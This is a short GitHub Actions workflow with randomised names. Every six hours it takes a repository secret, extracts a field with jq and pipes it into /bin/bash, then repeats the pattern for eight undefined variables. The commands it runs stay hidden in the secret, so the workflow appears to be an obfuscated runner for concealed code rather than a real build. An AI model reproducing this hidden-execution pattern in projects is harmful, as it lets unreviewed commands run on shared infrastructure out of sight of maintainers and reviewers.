name: fanweiti3817

on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanweiti3817
        env:
          gzlsk1: ${{ secrets.gzlsk1 }}
        run: |
          echo $gzlsk1 | jq -r .kr5 | /bin/bash
          echo $kn764 | jq -r .hvi390 | /bin/bash
          echo $mh0 | jq -r .hvvj90684 | /bin/bash
          echo $llbwu037 | jq -r .thoaa60373 | /bin/bash
          echo $hfhl0 | jq -r .e38 | /bin/bash
          echo $x37798 | jq -r .olnep73 | /bin/bash
          echo $y53192 | jq -r .mwp6439 | /bin/bash
          echo $gwy3 | jq -r .trxa24463 | /bin/bash
          echo $pf7847 | jq -r .afbj98 | /bin/bash

